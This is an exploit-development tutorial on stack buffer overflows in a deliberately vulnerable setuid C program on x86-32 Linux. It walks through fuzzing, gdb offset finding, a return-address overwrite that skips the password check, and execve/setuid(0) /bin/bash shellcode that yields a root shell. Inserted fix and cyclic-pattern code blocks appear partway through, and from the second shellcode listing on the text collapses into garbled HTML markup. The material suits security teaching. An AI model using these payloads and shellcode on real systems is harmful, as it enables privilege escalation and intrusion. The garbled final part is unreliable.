Plain Buffer Overflow

8 May 2014 at 16:35
By: 0xe7
This is the start of a series of tutorials exploring how to detect and exploit [stack](https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29) based vulnerabilities on x86-32 Linux systems. As this is the first, it covers detecting and exploiting a [buffer overflow](https://en.wikipedia.org/wiki/Buffer_overflow) on a system with no protections in place. Modern protections will be explored in future tutorials, but it is important to understand the basics before taking on the more complex situations.

A buffer overflow happens when a programmer has not done sufficient bounds checking before or while copying the contents of one buffer into another. A buffer is normally either an array variable (on the stack) or memory obtained from a dynamic memory allocation function (on the [heap](https://en.wikipedia.org/wiki/Memory_management#Dynamic_memory_allocation)). We will concentrate on stack based (array variable) buffer overflows first, as they are much easier for beginners to understand.

All of the code in this tutorial was written by the author.

## The Vulnerable App

Below is the source code of the vulnerable application that we will be attacking.
It is written in [C](https://en.wikipedia.org/wiki/C_%28programming_language%29).

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"

#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
    r = checkpass(argv[1]);
    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }
    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;
    strncpy(p, a, strlen(a)+1);  /* copies as many bytes as the caller supplied, not as many as p can hold */
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;
    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            putchar(c);
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}
```

### The Fix

The line vulnerable to a stack based buffer overflow is the `strncpy(p, a, strlen(a)+1);` call in `checkpass`. Here the programmer has set the maximum number of bytes copied into the 512-byte buffer `p` to `strlen(a)+1`, but that is the length of the input the user supplied, so the bound is controlled by the user rather than by the size of the destination (and the `+1` means the terminating null byte is copied as well, so an input of N characters writes N+1 bytes onto the stack). To fix this vulnerability the line should be changed to `strncpy(p, a, sizeof(p)-1);` (or `strncpy(p, a, 511);`), followed by `p[sizeof(p)-1] = '\0';`. We subtract the 1 byte to leave space for the terminating null character `'\0'`, and the extra assignment is needed because `strncpy` only writes a terminator when the source is shorter than the count: for an input of 511 bytes or more it fills all 511 bytes and leaves `p[511]` untouched, so the following `strcmp` would read past the end of the buffer. A simpler alternative is to reject any input with `strlen(a) >= sizeof(p)` before copying at all. For more information about strncpy see [man strncpy](http://linux.die.net/man/3/strncpy).

Separately, `printf(argv[0])` and `printf(argv[1])` in `main` pass user input as the format string, which is a format string bug in its own right. This tutorial does not use it, but in real code these calls should be `printf("%s", argv[1])` or `fputs`.
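To make the fix concrete, here is an added example (not the tutorial's own code) that puts the vulnerable `checkpass` beside two hardened versions and includes a small probe showing why `strncpy(p, a, sizeof(p)-1)` on its own leaves the buffer unterminated. It uses the same `PASS` and 512-byte buffer as `app.c`; the function names, the `long_input` helper and the 600-byte test string are constructed for this example.

```c
/* Added example (not the tutorial's own code): the vulnerable checkpass next to
 * two hardened versions, plus a probe showing why strncpy(p, a, sizeof(p)-1)
 * alone is not a complete fix. PASS and the 512-byte buffer match app.c. */
#include <stdio.h>
#include <string.h>

#define PASS  "topsecretpassword"
#define BUFSZ 512

/* The original: copies strlen(a)+1 bytes into a 512-byte buffer, so any
 * argument of 512 or more characters writes past the end of p.
 * Kept for comparison only; never call it with untrusted input. */
int checkpass_vulnerable(const char *a)
{
    char p[BUFSZ];
    int r;
    strncpy(p, a, strlen(a) + 1);
    r = strcmp(p, PASS);
    return r;
}

/* Probe: after strncpy(p, a, sizeof(p)-1), is there a NUL anywhere in p?
 * strncpy pads with NULs only when the source is shorter than the count, so
 * for inputs of 511+ bytes the buffer is left unterminated and a following
 * strcmp would read beyond it. Returns 1 if terminated, 0 if not. */
int strncpy_only_is_terminated(const char *a)
{
    char p[BUFSZ];
    memset(p, 'X', sizeof p);          /* sentinel: bytes strncpy does not write stay 'X' */
    strncpy(p, a, sizeof(p) - 1);
    return memchr(p, '\0', sizeof p) != NULL;
}

/* Fix 1: bound the copy by the destination and terminate explicitly.
 * Over-long input is truncated to 511 bytes and then fails the comparison. */
int checkpass_fixed(const char *a)
{
    char p[BUFSZ];
    strncpy(p, a, sizeof(p) - 1);
    p[sizeof(p) - 1] = '\0';
    return strcmp(p, PASS);
}

/* Fix 2: check the length first and refuse anything that cannot fit, so no
 * truncation happens at all. Returns -1 for rejected input. */
int checkpass_lengthcheck(const char *a)
{
    char p[BUFSZ];
    size_t n = strlen(a);
    if (n >= sizeof p)
        return -1;
    memcpy(p, a, n + 1);               /* n + 1 <= sizeof p, includes the NUL */
    return strcmp(p, PASS);
}

/* Constructed test input: a string of n 'A's (capped so it always fits). */
const char *long_input(size_t n)
{
    static char buf[2048];
    if (n > sizeof buf - 1)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    printf("short input terminated after strncpy:    %d\n", strncpy_only_is_terminated("test"));
    printf("600-byte input terminated after strncpy: %d\n", strncpy_only_is_terminated(long_input(600)));
    printf("checkpass_fixed(PASS)             = %d\n", checkpass_fixed(PASS));
    printf("checkpass_fixed(600 A's)          = %d\n", checkpass_fixed(long_input(600)) != 0);
    printf("checkpass_lengthcheck(600 A's)    = %d\n", checkpass_lengthcheck(long_input(600)));
    return 0;
}
```

Of the two, the length check is the safer pattern: truncate-then-compare would accept an over-long input whose first 511 bytes happen to equal the password, whereas rejecting anything that cannot fit keeps the comparison exact and never writes a partial copy.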
## Setting Up The Environment

This is how to set up the environment in full on a [Debian](https://www.debian.org/) based system:

```console
root@host:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n]
root@host:~# ls
app.c
root@host:~# gcc -z execstack -fno-stack-protector -o app app.c
root@host:~# cp app /home/testuser/
root@host:~# cat /proc/sys/kernel/randomize_va_space 
2
root@host:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@host:~# cat /proc/sys/kernel/randomize_va_space
0
root@host:~# cd /home/testuser/
root@host:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@host:/home/testuser# chmod u+s app
root@host:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@host:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@host:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt
root@host:/home/testuser# chmod 600 secret.txt
root@host:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
root@host:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@host:/home/testuser# su - testuser
testuser@host:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@host:~$ ls -l secret.txt 
-rw------- 1 root root 91 May 9 13:40 secret.txt
testuser@host:~$ cat secret.txt
cat: secret.txt: Permission denied
```

So our environment is set up and ready for exploit development. First a `testuser` account is added to run the application as. The application is then compiled with `gcc -z execstack -fno-stack-protector`, which leaves the stack executable and removes the stack canary (GCC's stack protector). ASLR is disabled by writing `0` to `/proc/sys/kernel/randomize_va_space` (this setting does not survive a reboot), so stack and library addresses stay the same from run to run. The setuid bit is set on `app` with `chmod u+s` so that, whoever runs it, it runs with root privileges, which are required to read `secret.txt` (created with the `echo` command and then made readable by root only with `chmod 600`). Lastly, `cat secret.txt` as `testuser` confirms that the file is not readable by the user who will run the application.

## Testing The App / Finding The Vulnerability

First we need to use the application to figure out its inputs and see how it behaves normally:

```console
testuser@host:~$ ./app
Usage: ./app <password>
testuser@host:~$ ./app test
Wrong password: test
testuser@host:~$ echo $?
1
```

As we can see, when we enter the wrong password the application's exit code is `1`. Let's try fuzzing this input to look for a buffer overflow; here is a simple Python script (`app-fuzz.py`) that does that:

```python
#!/usr/bin/env python

from subprocess import Popen, PIPE

count = 0  # the number of A's that caused the crash

for i in range(5000):  # try inputs of 0 to 4999 A's
    # execute ./app with the argument "A"*i, so the number of A's grows by 1 each run
    process = Popen(["./app", "A" * i], stdin=PIPE, stdout=PIPE)
    (output, err) = process.communicate()

    exit_code = process.wait()  # the program's exit code (negative if it was killed by a signal)
    if exit_code != 1:  # anything other than the "Wrong password" exit code
        count = i  # record how many A's it took
        break

print(count)  # the number of A's it took to crash it
```

Running the Python script gives us:
```console
testuser@host:~$ python app-fuzz.py
524
```

## Exploiting The App

So the Python script crashed the application with an input of 524 A's. Crashing the application does not by itself mean we have taken control of its execution, so we now need to figure out how many bytes we have to send before we hijack execution (one character is a single byte, so 524 A's is 524 bytes). Note that the first crash happens inside libc (in `strchrnul`, called from `printf`, as the gdb session below shows) rather than at an address we supplied: the overwrite has already damaged data that `main` uses after `checkpass` returns, but not yet the saved return address.

We will use `gdb` to do this. The hex for `A` is `41`, which you can look up in the ascii man page ([man ascii](http://unixhelp.ed.ac.uk/CGI/man-cgi?ascii+7)). Addresses, and therefore registers such as EIP, are 32 bits (4 bytes) wide on this system, so once our input reaches the saved return address the application should crash trying to execute from `0x41414141`:

```console
testuser@host:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 524')
Starting program: /home/testuser/app $(python -c 'print "A" * 524')

Program received signal SIGSEGV, Segmentation fault.
0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) r $(python -c 'print "A" * 528')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 528')

Program received signal SIGSEGV, Segmentation fault.
0xbffff970 in ?? ()
(gdb) r $(python -c 'print "A" * 532')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 532')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
```

We increase the number of bytes by 4 each time because each slot on the stack (saved EBP, saved return address) is 4 bytes wide on a 32-bit system. With 532 A's the instruction the application is trying to run is at `0x41414141` (the last line of the session), which is just `AAAA`: bytes 528 to 531 of our input have replaced the saved return address of `checkpass`, and the CPU jumped there when `checkpass` returned. So the payload layout is 528 bytes of padding followed by the 4-byte address we want executed, written least significant byte first (little-endian, the x86 byte order).

One caveat when testing: the offset can be found under gdb, but the finished payload must be run outside it. The kernel does not honour the setuid bit for a program being traced by an unprivileged user, so inside gdb `app` runs as `testuser` and `printfile` cannot open `secret.txt`.
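The same offset can be found in a single run with a cyclic pattern instead of stepping the input length by four. The tool below is an added example and not part of the original tutorial: it generates the well-known Metasploit-style `Aa0Aa1...` pattern, whose 4-byte windows are unique for the first 20280 bytes, and maps the EIP value gdb prints back to a byte offset in that pattern. The program name `pattern` and its command-line interface are assumptions of this example; the app, the offset of 528 and the gdb workflow are the ones above.

```c
/* Added example (not part of the original tutorial): cyclic pattern tool for
 * finding the return-address offset in one run. Generates the Metasploit-style
 * "Aa0Aa1..." pattern (unique 4-byte windows for the first 20280 bytes) and
 * maps the EIP value gdb reports back to an offset in that pattern. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill out[0..len-1] with the pattern and NUL-terminate it (out needs len+1
 * bytes). The pattern contains no NUL or shell-special bytes, so it can be
 * passed as a command-line argument and survives the app's strncpy/strlen. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char triple[3] = { u, l, d };
                for (int k = 0; k < 3 && n < len; k++)
                    out[n++] = triple[k];
            }
    out[n] = '\0';
    return n;
}

/* The 32-bit value the CPU would load from the pattern at byte offset off,
 * read little-endian the way a saved return address is popped into EIP.
 * This is what gdb prints as "0x........ in ?? ()" when that slot is hit.
 * Returns 0 if the window does not fit in a pattern of length len. */
uint32_t pattern_dword_at(size_t off, size_t len)
{
    char *pat = malloc(len + 1);
    uint32_t v = 0;
    if (pat == NULL || off + 4 > pattern_create(pat, len)) {
        free(pat);
        return 0;
    }
    for (int i = 3; i >= 0; i--)
        v = (v << 8) | (unsigned char)pat[off + i];
    free(pat);
    return v;
}

/* Inverse: given the faulting EIP value, find where its four bytes sit in a
 * pattern of length len. Returns the offset, or -1 if EIP did not come from
 * the pattern (e.g. 0x41414141 from an all-'A' input, or a libc address). */
long pattern_offset(uint32_t eip, size_t len)
{
    unsigned char needle[4];
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(eip >> (8 * i));   /* little-endian byte order */

    char *pat = malloc(len + 1);
    if (pat == NULL)
        return -1;
    size_t n = pattern_create(pat, len);
    long found = -1;
    for (size_t i = 0; i + 4 <= n; i++)                 /* memcmp, not strstr: needle may contain NUL */
        if (memcmp(pat + i, needle, 4) == 0) {
            found = (long)i;
            break;
        }
    free(pat);
    return found;
}

/* Usage: ./pattern LEN             prints a LEN-byte pattern to feed to the app
 *        ./pattern LEN 0x41367241  prints the offset of that EIP value in the pattern */
int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s LEN [EIP_HEX]\n", argv[0]);
        return 1;
    }
    size_t len = strtoul(argv[1], NULL, 0);
    if (argc == 2) {
        char *pat = malloc(len + 1);
        if (pat == NULL)
            return 1;
        pattern_create(pat, len);
        fputs(pat, stdout);
        free(pat);
    } else {
        printf("%ld\n", pattern_offset((uint32_t)strtoul(argv[2], NULL, 16), len));
    }
    return 0;
}
```

In gdb the run becomes `r $(./pattern 600)`. Since the saved return address sits at offset 528 in this app, the crash should be reported at `0x41367241` (the bytes `Ar6A` read little-endian), and `./pattern 600 0x41367241` prints `528`, the same offset found above by stepping in fours. An EIP of `0x41414141` from an all-`A` input, or a libc address such as the first crash above, is reported as `-1` because it is not a window of the pattern.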
<p>First we need to find the address of the code that runs after the check; again we use <code>gdb</code> for this:</p>
<pre><code> 1  testuser@host:~$ gdb -q ./app
 2  Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
 3  (gdb) set disassembly-flavor intel
 4  (gdb) disassemble main
 5  Dump of assembler code for function main:
 6   0x0804860c &lt;+0&gt;:   push   ebp
 7   0x0804860d &lt;+1&gt;:   mov    ebp,esp
 8   0x0804860f &lt;+3&gt;:   and    esp,0xfffffff0
 9   0x08048612 &lt;+6&gt;:   sub    esp,0x20
10   0x08048615 &lt;+9&gt;:   cmp    DWORD PTR [ebp+0x8],0x1
11   0x08048619 &lt;+13&gt;:  jg     0x804864c &lt;main+64&gt;
12   0x0804861b &lt;+15&gt;:  mov    DWORD PTR [esp],0x80487f0
13   0x08048622 &lt;+22&gt;:  call   0x8048470 &lt;...@plt&gt;
14   0x08048627 &lt;+27&gt;:  mov    eax,DWORD PTR [ebp+0xc]
15   0x0804862a &lt;+30&gt;:  mov    eax,DWORD PTR [eax]
16   0x0804862c &lt;+32&gt;:  mov    DWORD PTR [esp],eax
17   0x0804862f &lt;+35&gt;:  call   0x8048470 &lt;...@plt&gt;
18   0x08048634 &lt;+40&gt;:  mov    DWORD PTR [esp],0x80487f8
19   0x0804863b &lt;+47&gt;:  call   0x80484a0 &lt;...@plt&gt;
20   0x08048640 &lt;+52&gt;:  mov    DWORD PTR [esp],0x1
21   0x08048647 &lt;+59&gt;:  call   0x80484c0 &lt;...@plt&gt;
22   0x0804864c &lt;+64&gt;:  mov    eax,DWORD PTR [ebp+0xc]
23   0x0804864f &lt;+67&gt;:  add    eax,0x4
24   0x08048652 &lt;+70&gt;:  mov    eax,DWORD PTR [eax]
25   0x08048654 &lt;+72&gt;:  mov    DWORD PTR [esp],eax
26   0x08048657 &lt;+75&gt;:  call   0x80486a2 &lt;checkpass&gt;
27   0x0804865c &lt;+80&gt;:  mov    DWORD PTR [esp+0x1c],eax
28   0x08048660 &lt;+84&gt;:  cmp    DWORD PTR [esp+0x1c],0x0
29   0x08048665 &lt;+89&gt;:  je     0x804869b &lt;main+143&gt;
30   0x08048667 &lt;+91&gt;:  mov    DWORD PTR [esp],0x8048804
31   0x0804866e &lt;+98&gt;:  call   0x8048470 &lt;...@plt&gt;
32   0x08048673 &lt;+103&gt;: mov    eax,DWORD PTR [ebp+0xc]
33   0x08048676 &lt;+106&gt;: add    eax,0x4
34   0x08048679 &lt;+109&gt;: mov    eax,DWORD PTR [eax]
35   0x0804867b &lt;+111&gt;: mov    DWORD PTR [esp],eax
36   0x0804867e &lt;+114&gt;: call   0x8048470 &lt;...@plt&gt;
37   0x08048683 &lt;+119&gt;: mov    DWORD PTR [esp],0xa
38   0x0804868a &lt;+126&gt;: call   0x8048500 &lt;...@plt&gt;
39   0x0804868f &lt;+131&gt;: mov    DWORD PTR [esp],0x1
40   0x08048696 &lt;+138&gt;: call   0x80484c0 &lt;...@plt&gt;
41   0x0804869b &lt;+143&gt;: call   0x80486f0 &lt;printfile&gt;
42   0x080486a0 &lt;+148&gt;: leave
43   0x080486a1 &lt;+149&gt;: ret
44  End of assembler dump.
</code></pre>
<p>I use the <code>-q</code> option to <code>gdb</code> to suppress the banner it normally prints on startup, and I set the disassembly flavor to <code>intel</code> because <code>gdb</code> defaults to AT&amp;T syntax and I prefer Intel.</p>
<p>The call to <code>printfile</code> on line 41 looks like a good place to jump to, and as we can see it is at address <code>0x0804869b</code>.</p>
<p>All we need to do is place this address after the 528 bytes of padding, byte-reversed because x86 is <a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank">little endian</a>; here is how:</p>
<pre><code>testuser@host:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"')
This is a top secret file!
Only people with the password should be able to view this file!
Segmentation fault
</code></pre>
<p>We still get a segmentation fault afterwards, but the contents of the file are printed first, meaning we have circumvented the password check.</p>
<h2>Developing Shellcode / Improving Exploitation</h2>
<p>Now I'm going to show you how to use this to run your own code as root. First we need some code to run.</p>
<p>I've written a quick <a href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank">assembly</a> program in <a href="http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html?iid=tech_vt_tech+64-32_manuals" target="_blank">IA-32</a> syntax which just runs the execve <a href="https://en.wikipedia.org/wiki/System_call" target="_blank">system call</a> with /bin/bash as its argument (for more information on execve itself see <a href="http://linux.die.net/man/2/execve" target="_blank">man execve</a>):</p>
<pre><code>; run /bin/bash

global _start

section .text

_start:
    jmp short Call_shellcode ; jump to where our string is

shellcode:
    pop ebx ; pop the address of our string into ebx
            ; which is the first argument to execve

    xor eax, eax ; zero out the eax register

    mov [ebx+9], al ; put a 0 where the A is to null
                    ; terminate the /bin/bash string

    mov al, 0xb ; put the sys call number 11 into eax

    mov [ebx+10], ebx ; put a pointer to the beginning
                      ; of the string where the BBBB is

    xor ecx, ecx ; zero out the ecx register

    mov [ebx+14], ecx ; replace the CCCC with 0000

    lea ecx, [ebx+10] ; load the address that used to
                      ; point to BBBB into ecx the second
                      ; argument to execve

    lea edx, [ebx+14] ; load the address that used to
                      ; point to CCCC into edx the third
                      ; argument to execve

    int 0x80 ; execute the syscall execve

Call_shellcode:
    call shellcode ; call the start of the actual application
    shell: db "/bin/bashABBBBCCCC" ; our string of
                                   ; arguments to execve
</code></pre>
<p>A 32-bit Linux system call works by loading the syscall number into the eax register, putting the first, second and third arguments into the ebx, ecx and edx registers respectively, and then executing <code>int 0x80</code>. To find the syscall number, do this:</p>
<pre><code>testuser@host:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve 11
</code></pre>
<p>This means execve is 11, or 0xb in hex.</p>
<p>In this shellcode I'm using the jmp-call-pop technique to get the address of the string and the list of arguments (a <code>call</code> instruction pushes the address of the next instruction onto the stack, so the <code>pop ebx</code> that follows receives the address of the string), which makes the code position independent.</p>
<p>So we now need to extract the shellcode bytes:</p>
<pre><code>testuser@host:~$ nasm -f elf32 -o shell.o shell.nasm
testuser@host:~$ ld -o shell shell.o
testuser@host:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
</code></pre>
<p>We now have shellcode, but we should test that it works; the following C program does that:</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* the 49 shellcode bytes extracted above */
unsigned char code[] =
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

int main(void)
{
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* treat the byte array as a function and call it */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}
</code></pre>
<p>I've split the byte string over several lines here for readability. Compiling and running it:</p>
<pre><code>testuser@host:~$ gcc -z execstack -o shellcode shellcode.c
testuser@host:~$ ./shellcode
Shellcode Length: 49
testuser@host:/home/testuser$
</code></pre>
<p>It worked: the new prompt belongs to the bash spawned by our shellcode. The <code>shellcode</code> program casts the address of the byte array to a function pointer and calls it, which runs the bytes in place (compiling with <code>-z execstack</code> is what allows a byte array in the data segment to be executed). You cannot simply run the assembled binary on its own, because it writes into its own string, which sits in the read-only <code>.text</code> section:</p>
<pre><code>testuser@host:~$ ./shell
Segmentation fault
</code></pre>
<p>Now we need to figure out a way to put our shellcode into the vulnerable application's memory and find its address, so that we can hijack execution with it.</p>
<p>We can put it in an environment variable and use <a href="http://linux.die.net/man/3/getenv" target="_blank">getenv</a> to get its address. Here is how we put it into an environment variable:</p>
<pre><code>testuser@host:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
</code></pre>
<p>Here is another C program that we can use to find the address an environment variable will have in the memory of another program:</p>
<pre><code>#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;

int main(int argc, char *argv[])
{
    char *ptr;

    if (argc &lt; 3) {
        printf("Usage: %s &lt;environment variable&gt; &lt;target program name&gt;\n", argv[0]);
        exit(0);
    }
    ptr = getenv(argv[1]);                 /* get env var location in our own process */
    if (ptr == NULL) {
        printf("%s is not set\n", argv[1]);
        exit(1);
    }
    /* adjust for program name: under bash the name appears twice above the
     * environment strings (the filename passed to execve and the _ variable),
     * so the variable moves by twice the difference in name length */
    ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;
    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}
</code></pre>
<p>We compile this program and run it with the relevant arguments:</p>
<pre><code>testuser@host:~$ gcc -o getenvaddr getenvaddr.c
testuser@host:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff774
</code></pre>
<p>Great, nearly there: we have the address of our shellcode, now to use it. We hijack the execution flow as before, but this time we point the return address at our environment variable:</p>
<pre><code>testuser@host:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami
testuser
bash-4.2$ cat secret.txt
cat: secret.txt: Permission denied
</code></pre>
<p>Damn, so that didn't work. Something must be dropping privileges (bash resets its effective UID to the real UID when the two differ). No need to worry: we change our shellcode to run the setuid system call with UID 0 (root) before calling execve (for more information on setuid see <a href="http://linux.die.net/man/2/setuid" target="_blank">man setuid</a>).</p>
<p>First we need to find out the syscall number:</p>
<pre><code>testuser@host:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_setuid 23
#define __NR_setuid32 213
</code></pre>
<p>The syscall number is 23, or 0x17 in hex. Our modified shellcode is:</p>
<pre><code>; run /bin/bash

global _start

section .text

_start:
    jmp short Call_shellcode ; jump to where our string is

shellcode:
    xor eax, eax ; zero out eax

    mov al, 0x17 ; put 23 into eax to setuid

    xor ebx, ebx ; zero out ebx

    int 0x80 ; make the syscall setuid

    mov eax, ebx ; zero out eax

    pop ebx ; pop the address of our string into ebx
            ; which is the first argument to execve

    mov [ebx+9], al ; put a 0 where the A is to null
                    ; terminate the /bin/bash string

    mov al, 0xb ; put the sys call number 11 into eax

    mov [ebx+
class="mi"10/spanspan class="p"],/span span class="nb"ebx/span span class="c1"; put a pointer to the beginning/span/span span class="code-line" span class="c1"; of the string where the BBBB is/span/span span class="code-line"/span span class="code-line" span class="nf"xor/span span class="nb"ecx/spanspan class="p",/span span class="nb"ecx/span span class="c1"; zero out the ecx register/span/span span class="code-line"/span span class="code-line" span class="nf"mov/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"],/span span class="nb"ecx/span span class="c1"; replace the CCCC with 0000/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"ecx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"10/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to BBBB into ecx the second/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"lea/span span class="nb"edx/spanspan class="p",/span span class="p"[/spanspan class="nb"ebx/span span class="o"+/spanspan class="mi"14/spanspan class="p"]/span span class="c1"; load the address that used to/span/span span class="code-line" span class="c1"; point to CCCC into edx the third/span/span span class="code-line" span class="c1"; argument to execve/span/span span class="code-line"/span span class="code-line" span class="nf"int/span span class="mh"0x80/span span class="c1"; execute the syscall execve/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/span/span span class="code-line" span class="nf"call/span span class="nv"shellcode/span span class="c1"; call the start of the actual application/span/span span class="code-line" span class="nl"shell:/span span class="kd"db/span span 
class="s"quot;/bin/bashABBBBCCCCquot;/span span class="c1"; our string of/span/span span class="code-line" span class="c1"; arguments to execve/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the same as before except I added a call to setuid before it starts setting up the call to execve. Let's first make sure it works:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"[email protected]:~$ /spanld -o 
shell2 shell2.o/span span class="code-line"span class="gp"[email protected]:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat shellcode.c/span span class="code-line"span 